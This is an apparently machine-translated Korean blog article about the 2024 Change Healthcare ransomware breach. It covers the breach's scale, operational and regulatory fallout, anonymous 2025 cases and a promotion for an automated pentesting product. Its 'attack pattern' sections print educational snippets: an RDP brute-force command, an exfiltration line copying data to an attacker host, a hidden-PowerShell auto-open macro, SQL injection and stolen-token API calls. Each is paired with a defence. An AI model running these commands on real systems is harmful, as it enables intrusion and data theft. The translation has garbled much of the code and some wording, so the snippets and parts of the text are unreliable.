의료 사이버 공격의 변화, 오늘 업데이트합니다: 현재 진행 중인 위기의 스냅샷
처음 발생한 체인지 헬스케어 사이버 공격은 다음과 같습니다. 2024년 2월 는 2025년 이후에도 사이버 보안 및 의료 서비스 운영을 계속해서 변화시킬 것입니다. 처음에 중대한 랜섬웨어 사고로 발표되었던 이 공격은 이후 다음과 같은 특징을 가진 것으로 확인되었습니다. 약 1억 9,300만 명에게 영향을 미쳤습니다.사상 최대 규모의 의료 데이터 유출 사건 중 하나로 기록되었습니다. 이 공격으로 인해 데이터 손실 외에도 전국적으로 결제 시스템, 약국 청구 처리 및 임상 승인 흐름이 중단되어 의료 부문의 시스템 취약성과 심각한 운영 위험이 모두 노출되었습니다.
무슨 일이 일어났고 왜 중요한지 자세히 알아보기
켜짐 2024년 2월 21일미국 최대 의료 데이터 처리업체 중 하나이자 UnitedHealth Group의 일부인 Change Healthcare는 청구 처리, 자격 확인, 약국 서비스 등을 지원하는 주요 시스템을 마비시키는 랜섬웨어 침입을 발견했습니다. healthplan.org 이는 한 병원이나 진료소에 영향을 미치는 국지적인 침해가 아니었습니다: 헬스케어의 인프라 프로세스 변경 연간 150억 건의 의료 거래 미국 내 모든 환자 상호 작용의 상당 부분을 담당하고 있습니다. 미국 병원 협회
이 공격의 원인은 ALPHV/BlackCat 랜섬웨어 그룹의 인프라의 많은 부분을 암호화하여 광범위한 중단과 운영 중단을 초래했습니다. 한때 의료 서비스 제공자는 전자 청구서를 제출할 수 없었고 약국은 보험을 통해 처방전을 확인할 수 없었으며 많은 환자가 본인 부담금을 지불하거나 치료를 연기해야 했습니다. healthplan.org
초기 추정치에 따르면 유출로 인해 약 1억 명의 개인이 영향을 받았지만, 2025년까지 최종 집계는 다음과 같이 조정되었습니다. 약 1억 9,270만 명의 영향을 받은 사람들-미국 인구의 거의 3분의 2에 해당합니다.

보안 침해로 인해 의료 IT의 중대한 취약점이 드러난 방법
중앙 정보 센터로서의 Change Healthcare의 역할은 시스템이 다운되면 거의 모든 의료 서비스 운영 계층에 파급되는 것을 의미했습니다. 미국 병원 협회(AHA)의 설문조사에 따르면 다음과 같습니다:
- 74% 의 병원이 의학적으로 필요한 승인 지연 등 환자 진료에 직접적인 영향을 받았다고 보고했습니다.
- 94% 워크플로 중단으로 인한 재정적 영향을 보고했습니다.
- 33% 는 매출의 절반 이상이 중단되었다고 말했습니다.
- 60% 시스템이 다시 온라인 상태가 되면 정상 운영으로 복구하는 데 2주에서 3개월이 걸립니다. 미국 병원 협회
이 통계에 따르면 이 공격은 단순히 백엔드 데이터베이스에 영향을 미치는 데이터 유출이 아니라 의료 서비스 제공 및 보건 행정의 모든 영역에 영향을 미치는 운영 위기.
몇 달이 지난 후에도 소규모 진료소는 청구 환급 지연, 급여와 서비스를 위협하는 현금 흐름 부족 등 후방 효과로 인해 어려움을 겪고 있습니다. PYMNTS.com
데이터 노출: 촬영된 데이터와 중요한 이유
공격자들은 체인지 헬스케어의 시스템에 침투한 후 방대한 양의 민감한 정보를 유출할 수 있었습니다. 회사 공시 및 외부 사이버 보안 보고서에 따르면:
- 보호 대상 건강 정보(PHI)환자 진단, 치료 계획, 투약 내역 및 검사 결과.
- 개인 식별 정보(PII)이름, 주소, 생년월일, 주민등록번호.
- 금융 및 보험 데이터요금제 ID, 청구 코드, 청구 기록, 결제 내역. Malwarebytes
이러한 상세한 PHI 및 PII의 유출은 HIPAA에 따른 규제 의무를 유발하는 것 이상으로 신원 도용, 의료 사기, 2차 시장에서의 의료 기록 오용 등 장기적인 위험을 수반합니다.
다음을 포함한 연방 규제 기관 HHS 시민권 사무소(OCR)는 제3자가 영향을 받는 대상 법인을 대신하여 홍보를 지원하는 경우에도 침해 통지 의무가 여전히 적용된다는 점을 거듭 강조했습니다.

최근 규제 및 법적 대응
이 유출 사건은 연방 기관의 조사를 받았을 뿐만 아니라 법적 조치도 촉발했습니다. 예를 들어, 네브래스카 법무장관의 소송에 따르면 Change Healthcare는 업계 표준 보안 보호 장치와 네트워크 세분화를 구현하지 않아 유출 규모와 서비스 중단 기간의 장기화에 기여했다고 주장하고 있습니다. HIPAA 저널
한편, HHS OCR은 HIPAA 규칙에 따른 위반 통지에 대한 책임을 지속적으로 명확히 하여 Change Healthcare, 해당 법인 및 규제 기관 간의 조율된 커뮤니케이션을 강조하고 있습니다.
연방 정책 차원에서 이 사건은 현재 의료 시스템과 입법 위원회 전반에서 화두가 되고 있는 의료 분야의 제3자 위험 관리를 위한 국가 표준 강화에 대한 논의를 촉발시켰습니다.
관찰된 실제 공격 패턴 및 랜섬웨어 기법
이 사고에서 공격자가 어떻게 활동했는지 이해하면 방어자가 향후 방어 체계를 구축하는 데 도움이 됩니다. 체인지 헬스케어 침해에는 지능형 랜섬웨어 캠페인에서 볼 수 있는 기법이 사용되었습니다:
공격 패턴 #1: 손상된 원격 액세스
많은 대규모 침해 사고는 손상된 원격 액세스 포털에서 시작됩니다. Change Healthcare의 경우, 미국 상원에서 공개적으로 보고된 증언에 따르면 다음과 같은 사실이 밝혀졌습니다. 다단계 인증(MFA)이 없는 Citrix 원격 액세스 는 초기 네트워크 액세스의 한 요소였습니다. 닉슨 피바디 LLP
다음은 시뮬레이션된 무차별 대입 예제입니다(교육용):
bash
1TP5RDP에 대한 교육용 무차별 대입 시뮬레이션 porthydra -L users.txt -P rockyou.txt rdp://changehealthcare.example.com
방어: 다단계 인증을 적용하고 계정 잠금 정책을 구현하여 이러한 시도를 차단하세요.
파워쉘
MFA 사용(Windows) 설정-사용자MFAPreference -아이덴티티 "Admin" -사용 $true
공격 패턴 #2: 피싱을 통한 인증정보 탈취
랜섬웨어 그룹은 피싱 캠페인에서 내부 랜섬웨어 배포로 전환하는 경우가 많습니다:
html
<input type="text" name="username">
<input type="password" name="password">
<input type="submit"></form>
방어: 이메일 필터링, 사용자 교육, 링크 행동 분석을 배포하여 초기 액세스를 방지하세요.
공격 패턴 #3: 이중 갈취 및 데이터 유출
이 최신 기술은 시스템을 암호화하는 동시에 도난당한 데이터를 공개하겠다고 위협합니다:
bash
대량 데이터 유출에 대한 교육용 시뮬레이션cp -r /SensitiveData 공격자@remotehost:/loot
방어: 데이터 손실 방지(DLP) 도구와 전송 중 암호화 탐지 기능을 사용하여 무단 전송을 식별하고 차단하세요.
공격 패턴 #4: 랜섬웨어 암호화 루프
일단 랜섬웨어가 설치되면 전체 파일 저장소를 암호화할 수 있습니다:
파워쉘
가상 암호화 루프 (교육용)Get-ChildItem -경로 C:\\Data | ForEach-Object { Encrypt-File -경로 $_.FullName -키 $key}
중요한 시스템을 격리하고 파일 변경 패턴을 모니터링하는 것은 필수적인 방어 수단입니다.
공격 패턴 #5: 클레임 처리 API의 SQL 인젝션
랜섬웨어 및 유출 캠페인 중에 공격자는 종종 다음을 찾습니다. 안전하지 않은 엔드포인트 를 사용하는 것이 좋습니다. Change Healthcare와 같은 엔드포인트에 영향을 미치는 가상 시나리오에는 SQL 인젝션이 포함될 수 있습니다:
python
#Python 예제: 안전하지 않은 SQL 쿼리(교육용) import sqlite3 conn = sqlite3.connect('claims.db') cursor = conn.cursor() user_input = "1 OR 1=1" # 악성 입력 쿼리 = f"SELECT * FROM claims WHERE patient_id = {user_input};" cursor.execute(query)
방어: 항상 매개변수화된 쿼리를 사용하여 주입을 방지하세요:
python
#Safe SQL 쿼리 커서 실행("SELECT * FROM 클레임 WHERE patient_id = ?", (user_input,))
이렇게 하면 공격자가 조작된 입력을 통해 전체 데이터베이스를 검색하는 것을 방지할 수 있습니다.
공격 패턴 #6: 의료 청구 문서 내 악성 매크로
공격자는 종종 다음을 통해 페이로드를 전달합니다. Excel 매크로 제공업체에 전송되는 청구 문서에 포함되어 있습니다:
vb
' Excel VBA 매크로(교육용) 하위 자동 열기() 셸 "powershell.exe -명령 시작-프로세스 cmd.exe", vbHideEnd 하위
방어: 기본적으로 매크로를 비활성화하고 문서 소스의 유효성을 검사합니다:
파워쉘
매크로 보안 정책 적용 Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
이는 임의의 매크로 실행을 차단하는 동시에 신뢰할 수 있는 출처에서 서명한 합법적인 스크립트는 허용합니다.
공격 패턴 #7: API 토큰 도용 및 무단 액세스
손상된 API 토큰을 통해 공격자는 환자 또는 청구 데이터에 액세스할 수 있습니다:
bash
#S모의 토큰 재사용 공격 (교육용)curl -H "권한 부여: Bearer stolen_token_here" <https://api.changehealthcare.example.com/claims>
방어: API 키를 자주 교체하고, 범위로 OAuth를 적용하고, 비정상적인 API 요청을 모니터링하세요:
python
1TP5토큰 유효성 검사 의사 코드
검증_토큰(토큰) 또는 토큰.is_revoked가 아닌 경우:
UnauthorizedError("유효하지 않거나 취소된 토큰") 발생
2025년 의료 사이버 공격 의료 서비스 변화를 넘어선 실제 사례
최근 몇 년간 가장 심각한 의료 사이버 사고로 꼽히는 Change Healthcare가 여전히 진행 중입니다, 2025년은 이미 동일한 구조적 약점을 반영하는 여러 실제 공격이 발생했습니다.중앙 집중식 플랫폼, 취약한 ID 제어, 지나치게 신뢰하는 API, 탐지 지연 등입니다.
이러한 사례는 다음과 같은 사실을 보여주기 때문에 중요합니다. 체인지 헬스케어의 배후에 있는 공격 패턴은 고립되지 않았습니다.하지만 더 광범위하고 가속화되고 있는 추세의 일부입니다.
사례 1 (2025): 지역 의료 네트워크에서 도난당한 VPN 자격 증명을 통한 랜섬웨어 공격
2025년 초, 여러 주에 걸친 지역 의료 네트워크에서 랜섬웨어 침입을 추적한 결과가 공개되었습니다. 타사 공급업체 침해로 인해 도난당한 VPN 자격 증명이 재사용된 경우. 공격자는 합법적으로 로그인하여 경계 방어를 완전히 우회한 다음 랜섬웨어를 배포하기 전에 약 2주 동안 내부 정찰을 수행했습니다.
이 사고는 제로데이 익스플로잇이나 이색적인 멀웨어가 아닌, Change Healthcare의 액세스 패턴과 매우 유사합니다. 불충분한 액세스 세분화와 결합된 자격 증명 도용.
관찰된 공격 행동(단순화된 시뮬레이션):
bash
#손상된 자격 증명을 사용한 합법적인 VPN 액세스openvpn --config corp-vpn.ovpn --auth-user-pass stolen_creds.txt
일단 내부로 진입한 공격자는 내부 서비스를 열거했습니다:
bash
nmap -sT 10.10.0.0/16
2025 방어 레슨: VPN 액세스에 의존하는 조직은 자격 증명을 다음과 같이 취급해야 합니다. 기본적으로 위반 가능. 조건부 액세스, MFA 적용, 디바이스 상태 확인, 지속적인 세션 재인증은 이제 선택적 강화가 아닌 필수 사항입니다.
사례 2 (2025): 의료 정보 센터 통합에서의 API 남용 사례
2025년에 발생한 또 다른 사례는 공격자가 의료 청구 플랫폼을 악용한 사례입니다. 과도한 권한이 부여된 API 토큰 클레임 조정에 사용됩니다. 암호화가 깨지지 않았습니다. 대신 '읽기 전용 조정'을 위해 발급된 토큰이 대량의 PHI를 추출하는 데 조용히 재사용되었습니다.
이 유형의 실패는 특히 Change Healthcare와 관련이 있습니다. 공급자, 결제자, 청산소 간의 API 신뢰 관계는 광범위하고 오래 지속됩니다..
관찰된 오용 패턴(교육용):
curl -H "Authorization: Bearer valid_but_over-privileged_token" \\ <https://api.billing.example.com/v1/claims?from=2023>
토큰이 유효했기 때문에 로깅 시스템은 비정상적인 볼륨 패턴이 나타날 때까지 활동에 플래그를 지정하지 않았습니다.
2025년에는 방어적 제어가 점점 더 많이 채택될 것입니다:
python
1TP5범위 지정 액세스 및 볼륨 제한 적용 요청.범위가 ["claims:read:self"]에 없는 경우: deny() 요청.속도 > baseline_rate: trigger_alert()
2025 방어 레슨: 헬스케어 API는 다음을 채택해야 합니다. 최소 권한 범위, 수명이 짧은 토큰, 행동 속도 기준선. 원격 분석이 없는 정적 API 키는 더 이상 방어할 수 없습니다.
사례 3 (2025): 의료 소프트웨어 업데이트를 통한 공급망 활용
2025년 중반, 한 의료 SaaS 제공업체는 공격자가 악성 로직을 삽입한 사실을 공개했습니다. CI/CD 파이프라인 종속성를 사용하여 정기 업데이트 중에 다운스트림 공급자 환경에 배포했습니다.
이 사건에는 처음에는 랜섬웨어가 포함되지 않았습니다. 대신 공격자들은 다음 사항에 집중했습니다. 자동 데이터 액세스 및 자격 증명 수집를 사용하여 몇 달 동안 탐지를 지연시킵니다.
단순화된 공급망 공격 패턴:
bash
1TP5악성 종속성 도입 업스트림npm 설치 분석-헬퍼@최신 버전
일단 배포되면 악성 코드는 환경 기밀을 조용히 전달합니다.
최신 2025 방어 대응:
bash
1TP5종속성 무결성 강화npm 감사 코스사인 검증 --키 trusted.pub 컨테이너-이미지
2025 방어 레슨: 의료 서비스 공급업체는 다음을 처리해야 합니다. 환자 안전 인프라로서의 소프트웨어 공급망 보안. SBOM, 종속성 서명 및 파이프라인 모니터링은 이제 실험적인 관행이 아니라 규제의 기대치입니다.
사례 4 (2025): 의료 금융 팀을 노리는 AI 지원 피싱
2025년에 주목할 만한 트렌드는 다음과 같습니다. 의료 재무 및 매출 주기 직원에게 맞춤화된 AI 생성 피싱 이메일. 이전 피싱 캠페인과 달리 이 메시지는 내부 용어, 청구 주기, 심지어 특정 결제자 워크플로우와도 밀접하게 일치했습니다.
여러 의료 기관에서 공격자들이 이러한 이메일을 다음과 같은 목적으로 사용했다고 보고했습니다. 클레임 처리 시스템용 자격 증명 수집나중에 랜섬웨어가 아닌 데이터 재판매를 통해 수익을 창출합니다.
단순화된 피싱 페이로드 예시(교육용):
html
<form action="/internal/billing-review">
<input name="username">
<input name="password"></form>
2025년에 주목받는 방어적 제어:
bash
#B행동 이메일 분석(개념) 이메일.semantic_similarity > 임계값 및 sender_untrusted: 격리()의 경우
2025 방어 레슨: 정적 피싱 탐지만으로는 더 이상 충분하지 않습니다. 의료 기관은 다음을 결합해야 합니다. 사용자 행동 분석, 시맨틱 분석, 지속적인 자격증명 위험 점수 부여.
의료 서비스 제공업체의 운영 및 재정 영향
많은 클리닉과 병원에서 보안 침해는 단순한 사이버 보안 문제가 아니라 재정적 위기였습니다. 전자 청구 시스템에 액세스할 수 없는 의료 서비스 제공업체는 수동 프로세스나 해결 방법으로 되돌아가야 했고, 이로 인해 환급이 지연되고 현금 흐름이 압박을 받았습니다. PYMNTS.com
매사추세츠 주와 같은 주에서는 조직이 수익 흐름 지연으로 어려움을 겪으면서 매일 수백만 달러의 재정적 손실을 보고 있다는 조사 결과가 있습니다. Reddit
다음을 포함한 연방 구호 활동 메디케어 선지급 정전의 영향을 받은 적격 공급자에게 재정 부족을 완화하기 위해 시행되었지만, 이는 시간이 지나면 상환해야 하는 일시적인 구제책입니다. cmadocs.org
2025년에도 변화의 의료 공격이 여전히 유효한 이유
최초 사건이 발생한 지 1년이 지난 지금, 의료 리더와 사이버 보안 전문가들은 Change Healthcare 침해 사고를 의료 IT 공급업체가 임상 운영 및 데이터 처리를 지원하는 방식의 구조적 약점을 드러낸 획기적인 사건으로 보고 있습니다. 미국 병원 협회
매우 중요합니다, 공급업체 집중 위험-타사 제공업체가 대부분의 워크플로우에 영향을 미치는 경우, 한 번의 유출이 업계 전체에 막대한 영향을 미친다는 것을 의미합니다. 미국 병원 협회
Penligent.ai: 자동화된 모의 침투 테스트 및 복원력 테스트를 위한 최신 도구
이러한 시스템적 위협에 직면하여 조직은 다음과 같은 방법을 모색하고 있습니다. 자동화된 모의 침투 테스트 플랫폼 를 통해 기존 보안 관행을 강화할 수 있습니다. Penligent.ai 는 AI 기반 정찰, 퍼징, 익스플로잇 시나리오 생성을 통합하여 보안팀이 숨겨진 취약점을 발견하고 공격자가 이를 악용하기 전에 완화 조치를 검증할 수 있도록 지원하는 플랫폼 중 하나입니다.
Penligent.ai의 기능은 다음과 같습니다:
- API 및 레거시 시스템을 위한 자동화된 표면 매핑 및 프로토콜 퍼징.
- 실제 위협 모델을 기반으로 취약점의 지능적인 우선순위를 지정합니다.
- SIEM/EDR과 통합하여 결과를 상호 연관시키고 대규모로 패턴을 탐지합니다.
보안팀은 원격 액세스 취약점이나 유출 채널과 같이 Change Healthcare 침해에서 발견된 것과 유사한 공격 벡터를 시뮬레이션하여 더 강력한 방어 체계를 구축하고 치명적인 타사 침해 가능성을 줄일 수 있습니다.
실제로 다음을 사용하는 조직은 Penligent.ai 는 침투 테스트 주기를 가속화하고 실제 침해가 발생할 때까지 발견되지 않을 수 있는 상태를 발견했습니다.
교훈 및 향후 방향
사이버 보안 리더들이 이번 침해 사고를 되돌아보면서 몇 가지 주제가 떠오릅니다:
- 제로 트러스트가 기본이 되어야 합니다: 기존의 경계 방어만으로는 충분하지 않습니다. 신원 중심 방어는 측면 이동을 줄입니다.
- 공급업체 위험 관리에는 개혁이 필요합니다: 이중화 없이 단일 클리어링하우스에 의존하는 것은 비용이 많이 드는 것으로 나타났습니다.
- 사이버 위생은 선택 사항이 될 수 없습니다: MFA, 패치, 세분화와 같은 기본 단계는 다양한 공격 경로를 방어합니다.
업계 애널리스트의 편집자 주 "한때 'IT 중단'으로 여겨지던 것이 이제는 분명히 미션 크리티컬한 국가 인프라 이벤트. 의료 부문은 사이버 보안을 부수적인 서류 작업이 아닌 핵심적인 환자 안전으로 취급해야 합니다."
결론 오늘의 업데이트가 의료 분야에 주는 의미
오늘 발표된 Change Healthcare 사이버 공격 업데이트는 단순한 현황 보고서가 아니라 고도로 상호 연결되고 데이터 집약적인 산업에서 진화하는 사이버 위험을 반영한 것입니다. 와 영향을 받은 약 1억 9,300만 명의 개인장기적인 운영 영향, 법률 및 규제 조사, 지속적인 복구 노력 등을 고려할 때 이번 침해 사고는 향후 수년간 연구되어 더 강력한 의료 보안 관행을 위한 경고이자 촉매제가 될 것입니다.
보안 전문가, 운영 리더, 정책 입안자가 앞으로 나아가야 할 길은 방어 자동화, 엄격한 공급업체 감독, 미래의 위협을 견딜 수 있는 탄력적인 아키텍처에 더 깊이 투자하는 것입니다.
권한 및 참조 링크
- 의료 서비스 공식 FAQ(HHS OCR)를 변경하세요: https://www.hhs.gov/hipaa/for-professionals/special-topics/change-healthcare-cybersecurity-incident-frequently-asked-questions/index.html
- AHA 사이버 보안 영향 및 대응: https://www.aha.org/change-healthcare-cyberattack-underscores-urgent-need-strengthen-cyber-preparedness-individual-health-care-organizations-and
- 침해 규모에 관한 의료 IT 뉴스: https://www.healthcareitnews.com/news/new-numbers-change-healthcare-data-breach-193-million-affected

